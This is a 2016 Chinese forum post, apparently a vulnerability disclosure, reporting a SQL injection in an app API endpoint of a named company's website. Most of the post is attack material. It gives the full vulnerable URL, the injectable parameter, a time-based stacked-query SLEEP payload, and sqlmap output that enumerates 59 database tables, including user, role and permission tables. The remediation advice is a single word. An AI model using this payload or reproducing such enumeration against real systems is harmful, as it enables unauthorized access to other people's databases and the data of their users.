HanDs
管理员

[7月漏洞公开] 暴风墨镜某站存在sql注入/59张表/权限控制数据库 



本来打算这几天来一波女性专题的,结果晚上来了这个洞

详细说明:

http://mj.cms.mojing.cn/api/v1/scene/video/testing.php?mobile_brand=Xiaomi&mobile_model=MI%204LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7%20Processor%20rev%201%20(v7l)&cpu_hardware_model=Qualcomm%20MSM8974PRO-AC



应该是app的api接口,抓包截获的流量,带上ua sqlmap,栈查询注入,



点信息



---

Parameter: cpu_hardware_model (GET)

Type: stacked queries

Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

Payload: mobile_brand=Xiaomi&mobile_model=MI 4LTE&image_result=1&sound_result=1&telecom_operator=3&cpu_instruction_model=ARMv7 Processor rev 1 (v7l)&cpu_hardware_model=Qualcomm MSM8974PRO-AC');(SELECT * FROM (SELECT(SLEEP(5)))szhG)#

---

漏洞证明:

23:52] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y

[01:26:47] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions

[01:26:47] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)

[01:26:55] [INFO] adjusting time delay to 2 seconds due to good response times

[01:26:57] [ERROR] invalid character detected. retrying..

[01:26:57] [WARNING] increasing time delay to 3 seconds

59

[01:27:22] [ERROR] invalid character detected. retrying..

[01:27:23] [WARNING] increasing time delay to 4 seconds



[01:27:23] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

acl_menu_url

[01:31:14] [INFO] retrieved: acl_permissions

[01:34:51] [INFO] retrieved: acl_resources

[01:37:40] [INFO] retrieved: acl_roles

[01:39:17] [INFO] retrieved: acl_user_to_role

[01:43:24] [INFO] retrieved: acl_users

[01:44:16] [INFO] retrieved: android_ba

修复方案:

过滤,厂商好冷,能送礼物么


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
暴风
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复